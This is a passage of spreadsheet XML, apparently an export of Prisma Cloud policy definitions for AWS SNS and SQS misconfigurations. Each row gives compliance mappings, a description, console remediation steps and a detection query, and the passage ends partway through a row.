          <t>HIPAA, HITRUST CSF v.11.2.0, GDPR, TX-RAMP Level 1, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2126" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2126" s="2" t="inlineStr"/>
      <c r="D2126" t="inlineStr"/>
      <c r="E2126" t="inlineStr"/>
      <c r="F2126" t="inlineStr"/>
      <c r="G2126" t="b">
        <v>1</v>
      </c>
      <c r="H21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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2126" t="inlineStr">
        <is>
          <t>aws-sns</t>
        </is>
      </c>
      <c r="K2126" t="inlineStr">
        <is>
          <t>AWS SNS Topic not encrypted by Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L2126" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2126" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2126" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2126" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2126" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2126" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2126" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2126" t="inlineStr"/>
      <c r="T2126" t="b">
        <v>0</v>
      </c>
      <c r="U2126" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2126" t="inlineStr">
        <is>
          <t>aws-sns-get-topic-attributes</t>
        </is>
      </c>
      <c r="W2126" t="inlineStr">
        <is>
          <t>This policy identifies AWS SNS Topics that are not encrypted by Customer Managed Key (CMK).
AWS SNS Topics are used to send notifications to subscribers and might contain sensitive information. SNS Topics are encrypted by default by a AWS managed key but users can specify CMK to get enhanced security, control over the encryption key and also comply with any regulatory requirements.
As a security best practice use of CMK to encrypt your SNS Topics is advisable as it gives you full control over the encrypted data.</t>
        </is>
      </c>
      <c r="X2126" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Go to the Amazon SNS Dashboard
4. Click on 'Topics'
5. Click on the reported Topic
6. Click on 'Edit' button from the console top menu to access the topic configuration settings.
7. Select the 'Encryption – optional', Ensure that Enable encryption option is selected.
8. Select the 'AWS KMS key' from the box other than default '(Default) alias/aws/sns' key based on your business requirement.
9. Choose 'Save changes' to apply the configuration changes.</t>
        </is>
      </c>
      <c r="Y2126" t="inlineStr"/>
      <c r="Z2126" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-sns-get-topic-attributes' AND json.rule = KmsMasterKeyId exists and KmsMasterKeyId equal ignore case "alias/aws/sns"</t>
        </is>
      </c>
      <c r="AA2126" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2126" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2126" t="inlineStr">
        <is>
          <t>PC-AWS-SNS-1127</t>
        </is>
      </c>
      <c r="AD2126" t="b">
        <v>1</v>
      </c>
      <c r="AE2126" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2126" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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6" t="inlineStr">
        <is>
          <t>490ef980-da4e-40f7-b75f-d43a8e0220c3</t>
        </is>
      </c>
      <c r="AI2126" t="inlineStr">
        <is>
          <t>d2cf5633-848e-499a-92b6-a10e3be376e6</t>
        </is>
      </c>
      <c r="AJ2126" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2126" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2127">
      <c r="A2127" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO 27002:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, CIS AWS 3 Tier Web Architecture Benchmark v.1.0.0, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, NIST SP 800-171 Revision 3,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ITSG-33, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, SOC 2, SOC 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2127" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2127" s="2" t="inlineStr"/>
      <c r="D2127" t="inlineStr"/>
      <c r="E2127" t="inlineStr"/>
      <c r="F2127" t="inlineStr"/>
      <c r="G2127" t="b">
        <v>1</v>
      </c>
      <c r="H21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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2127" t="inlineStr">
        <is>
          <t>aws-sns</t>
        </is>
      </c>
      <c r="K2127" t="inlineStr">
        <is>
          <t>AWS SNS topic policy overly permissive for subscription</t>
        </is>
      </c>
      <c r="L2127" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2127" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2127" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2127" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2127" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2127" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2127" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2127" t="inlineStr"/>
      <c r="T2127" t="b">
        <v>0</v>
      </c>
      <c r="U2127" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2127" t="inlineStr">
        <is>
          <t>aws-sns-get-topic-attributes</t>
        </is>
      </c>
      <c r="W2127" t="inlineStr">
        <is>
          <t>This policy identifies AWS SNS topics that have SNS policy overly permissive for the subscription. When you subscribe an endpoint to a topic, the endpoint begins to receive messages published to the associated topic. To protect these messages from attackers and unauthorized accesses, permissions should be given to only authorized users.
For more details:
https://docs.aws.amazon.com/sns/latest/dg/sns-security-best-practices.html#implement-least-privilege-access</t>
        </is>
      </c>
      <c r="X2127" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Navigate to the 'Simple Notification Service' dashboard
4. Go to 'Topics', from the left panel
5. Select the reported SNS topic
6. Click on the 'Edit' button from the top options bar
7. On the edit page go to the 'Access Policy - optional' section
8. Add the restrictive 'Condition' statement to the JSON editor to specify who can subscribe to this topic.
9. Click on 'Save changes'</t>
        </is>
      </c>
      <c r="Y2127" t="inlineStr"/>
      <c r="Z2127" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-sns-get-topic-attributes' AND json.rule = Policy.Statement[?any(Effect equals Allow and (Principal.AWS equals * or Principal equals *) and (Action contains SNS:Subscribe or Action contains sns:Subscribe or Action contains SNS:Receive or Action contains sns:Receive) and Condition does not exist)] exists</t>
        </is>
      </c>
      <c r="AA2127" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2127" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2127" t="inlineStr">
        <is>
          <t>PC-AWS-SNS-670</t>
        </is>
      </c>
      <c r="AD2127" t="b">
        <v>1</v>
      </c>
      <c r="AE2127" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2127" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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7" t="inlineStr">
        <is>
          <t>f1327669-bf9b-4062-bdc3-be19b9f20ba5</t>
        </is>
      </c>
      <c r="AI2127" t="inlineStr">
        <is>
          <t>b82861da-8e73-4afd-8fc7-527578c0123c</t>
        </is>
      </c>
      <c r="AJ2127" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2127" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2128">
      <c r="A2128" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO 27002:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2,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Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, HIPAA, ITSG-33, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, SOC 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), TX-RAMP Level 2, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, SOC 2, NYDFS 23 CRR-NY 500.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ITSG-33, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2128" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2128" s="2" t="inlineStr"/>
      <c r="D2128" t="inlineStr"/>
      <c r="E2128" t="inlineStr"/>
      <c r="F2128" t="inlineStr"/>
      <c r="G2128" t="b">
        <v>1</v>
      </c>
      <c r="H21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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2128" t="inlineStr">
        <is>
          <t>aws-sns</t>
        </is>
      </c>
      <c r="K2128" t="inlineStr">
        <is>
          <t>AWS SNS topic is exposed to unauthorized access</t>
        </is>
      </c>
      <c r="L2128" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2128" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2128" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2128" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2128" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2128" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2128" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2128" t="inlineStr"/>
      <c r="T2128" t="b">
        <v>0</v>
      </c>
      <c r="U2128" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2128" t="inlineStr">
        <is>
          <t>aws-sns-get-topic-attributes</t>
        </is>
      </c>
      <c r="W2128" t="inlineStr">
        <is>
          <t>This policy identifies AWS SNS topics that are exposed to unauthorized access. Amazon Simple Notification Service (Amazon SNS) is a web service that coordinates and manages the delivery or sending of messages to subscribing endpoints or clients. To protect these messages from attackers and unauthorized accesses, permissions should be given to only authorized users.
For more details:
https://docs.aws.amazon.com/sns/latest/dg/sns-security-best-practices.html#ensure-topics-not-publicly-accessible</t>
        </is>
      </c>
      <c r="X2128" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Navigate to the 'Simple Notification Service' dashboard
4. Go to 'Topics', from the left panel
5. Select the reported SNS topic
6. Click on the 'Edit' button from the top options bar
7. On the edit page go to the 'Access Policy - optional' section
8. Add the restrictive 'Condition' statement to the JSON editor to specify who can access the topic. OR Make 'Principal' restrictive so that only limited resources allowed.
9. Click on 'Save changes'</t>
        </is>
      </c>
      <c r="Y2128" t="inlineStr"/>
      <c r="Z2128" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-sns-get-topic-attributes' AND json.rule = Policy.Statement[?any(Effect equals Allow and (Principal.AWS equals * or Principal equals *) and Condition does not exist)] exists</t>
        </is>
      </c>
      <c r="AA2128" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2128" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2128" t="inlineStr">
        <is>
          <t>PC-AWS-SNS-669</t>
        </is>
      </c>
      <c r="AD2128" t="b">
        <v>1</v>
      </c>
      <c r="AE2128" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2128" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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8" t="inlineStr">
        <is>
          <t>8cad8d21-a1ad-47a2-a014-3290afca1c12</t>
        </is>
      </c>
      <c r="AI2128" t="inlineStr">
        <is>
          <t>b1955eb4-9d76-420e-89c5-8799deb559f4</t>
        </is>
      </c>
      <c r="AJ2128" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2128" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2129">
      <c r="A2129" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO 27002:2022, RBI Baseline Cyber Security and Resilience Requirements, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), Microsoft Cloud Security Benchmark v1, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27001:2022, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2129" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2129" s="2" t="inlineStr"/>
      <c r="D2129" t="inlineStr"/>
      <c r="E2129" t="inlineStr"/>
      <c r="F2129" t="inlineStr"/>
      <c r="G2129" t="b">
        <v>1</v>
      </c>
      <c r="H21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29" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2129" t="inlineStr">
        <is>
          <t>aws-sns</t>
        </is>
      </c>
      <c r="K2129" t="inlineStr">
        <is>
          <t>AWS SNS topic with cross-account access</t>
        </is>
      </c>
      <c r="L2129" t="inlineStr">
        <is>
          <t>CROSS_ACCOUNT_TRUST</t>
        </is>
      </c>
      <c r="M2129" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2129" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2129" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2129" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2129" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2129" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2129" t="inlineStr"/>
      <c r="T2129" t="b">
        <v>0</v>
      </c>
      <c r="U2129" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2129" t="inlineStr">
        <is>
          <t>aws-sns-get-topic-attributes</t>
        </is>
      </c>
      <c r="W2129" t="inlineStr">
        <is>
          <t>This policy identifies AWS SNS topics that are configured with cross-account access. Allowing unknown cross-account access to your SNS topics will enable other accounts and gain control over your AWS SNS topics. To prevent unknown cross-account access, allow only trusted entities to access your Amazon SNS topics by implementing the appropriate SNS policies.</t>
        </is>
      </c>
      <c r="X2129" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Navigate to the 'Simple Notification Service' dashboard
4. Go to 'Topics', from the left panel
5. Select the reported SNS topic
6. Click on the 'Edit' button from the top options bar
7. On the edit page go to the 'Access Policy - optional' section
8. In the Access Policy section, verify all ARN values in 'Principal' elements are from trusted entities; If not remove those ARN from the entry.
9. Click on 'Save changes'</t>
        </is>
      </c>
      <c r="Y2129" t="inlineStr"/>
      <c r="Z2129" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-sns-get-topic-attributes' AND json.rule = Policy.Statement[?any(Effect equals Allow and (Principal.AWS does not equal * and Principal does not equal * and Principal.AWS contains arn and Principal.AWS does not contain $.Owner))] exists</t>
        </is>
      </c>
      <c r="AA2129" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2129" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2129" t="inlineStr">
        <is>
          <t>PC-AWS-SNS-681</t>
        </is>
      </c>
      <c r="AD2129" t="b">
        <v>1</v>
      </c>
      <c r="AE2129" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2129" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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29" t="inlineStr">
        <is>
          <t>590cd7d9-9085-428b-bfbe-b407be7a6203</t>
        </is>
      </c>
      <c r="AI2129" t="inlineStr">
        <is>
          <t>664a58af-ce01-4d17-a990-11671633e602</t>
        </is>
      </c>
      <c r="AJ2129" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2129" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2130">
      <c r="A2130" t="inlineStr">
        <is>
          <t>HIPAA, GDPR, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2022.2.1, NIST 800-53 Rev 5, MLPS 2.0 (Level 2), SOC 2, NIST SP 800-171 Revision 3, GDPR, DORA, Microsoft Cloud Security Benchmark v1, Sarbanes Oxley Act (SOX), SOC 2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2130" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2130" s="2" t="inlineStr"/>
      <c r="D2130" t="inlineStr"/>
      <c r="E2130" t="inlineStr"/>
      <c r="F2130" t="inlineStr"/>
      <c r="G2130" t="b">
        <v>1</v>
      </c>
      <c r="H21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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2130" t="inlineStr">
        <is>
          <t>aws-sqs</t>
        </is>
      </c>
      <c r="K2130" t="inlineStr">
        <is>
          <t>AWS SQS Queue not configured with server side encryption</t>
        </is>
      </c>
      <c r="L2130" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2130" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2130" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2130" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2130" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2130" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2130" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2130" t="inlineStr"/>
      <c r="T2130" t="b">
        <v>0</v>
      </c>
      <c r="U2130" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2130" t="inlineStr">
        <is>
          <t>aws-sqs-get-queue-attributes</t>
        </is>
      </c>
      <c r="W2130" t="inlineStr">
        <is>
          <t>This policy identifies AWS SQS queues which are not configured with server side encryption. Enabling server side encryption would encrypt all messages that are sent to the queue and the messages are stored in encrypted form. Amazon SQS decrypts a message only when it is sent to an authorised consumer. It is recommended to enable server side encryption for AWS SQS queues in order to protect sensitive data in the event of a data breach or malicious users gaining access to the data.</t>
        </is>
      </c>
      <c r="X2130" t="inlineStr">
        <is>
          <t>To configure server side encryption for AWS SQS queue follow below URL as required:
To configure Amazon SQS key (SSE-SQS) for a queue:
https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-configure-sqs-sse-queue.html
To configure AWS Key Management Service key (SSE-KMS) for a queue:
https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-configure-sse-existing-queue.html 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-16-encrypt-sqs-queue
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-16-encrypt-sqs-queue</t>
        </is>
      </c>
      <c r="Y2130" t="inlineStr"/>
      <c r="Z2130" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-sqs-get-queue-attributes' AND json.rule = attributes.KmsMasterKeyId does not exist and attributes.SqsManagedSseEnabled is false
{"category":"General","resourceTypes":["aws_sqs_queue"]}</t>
        </is>
      </c>
      <c r="AA2130" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2130" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2130" t="inlineStr">
        <is>
          <t>PC-AWS-SQS-937-CKV_AWS_27</t>
        </is>
      </c>
      <c r="AD2130" t="b">
        <v>1</v>
      </c>
      <c r="AE2130" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2130" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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0" t="inlineStr">
        <is>
          <t>72a1d6ff-dd56-4107-afc0-6eda4ce934b8</t>
        </is>
      </c>
      <c r="AI2130" t="inlineStr">
        <is>
          <t>816b8edc-773e-44a9-ad28-f8375ffdfe42</t>
        </is>
      </c>
      <c r="AJ2130" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2130" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2131">
      <c r="A2131" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO 27002:2022, HIPAA, RBI Baseline Cyber Security and Resilience Requirements, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, ISO 27002:2022, ISO/IEC 27002:2013, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, NIST SP 800-171 Revision 3, CIS Controls v8.1, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, HIPAA, ITSG-33, ISO/IEC 27018:2019, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Insurance Regulatory And Development Authority Of India, ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, CIS Controls v7.1, MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, ISO/IEC 27002:2013, SOC 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SOC 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, CSA CCM v.4.0.1, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, ISO/IEC 27001:2022, PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2131" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2131" s="2" t="inlineStr"/>
      <c r="D2131" t="inlineStr"/>
      <c r="E2131" t="inlineStr"/>
      <c r="F2131" t="inlineStr"/>
      <c r="G2131" t="b">
        <v>1</v>
      </c>
      <c r="H21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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2131" t="inlineStr">
        <is>
          <t>aws-sqs</t>
        </is>
      </c>
      <c r="K2131" t="inlineStr">
        <is>
          <t>AWS SQS queue access policy is overly permissive</t>
        </is>
      </c>
      <c r="L2131" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2131" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2131" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2131" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2131" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2131" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2131" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2131" t="inlineStr"/>
      <c r="T2131" t="b">
        <v>0</v>
      </c>
      <c r="U2131" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2131" t="inlineStr">
        <is>
          <t>aws-sqs-get-queue-attributes</t>
        </is>
      </c>
      <c r="W2131" t="inlineStr">
        <is>
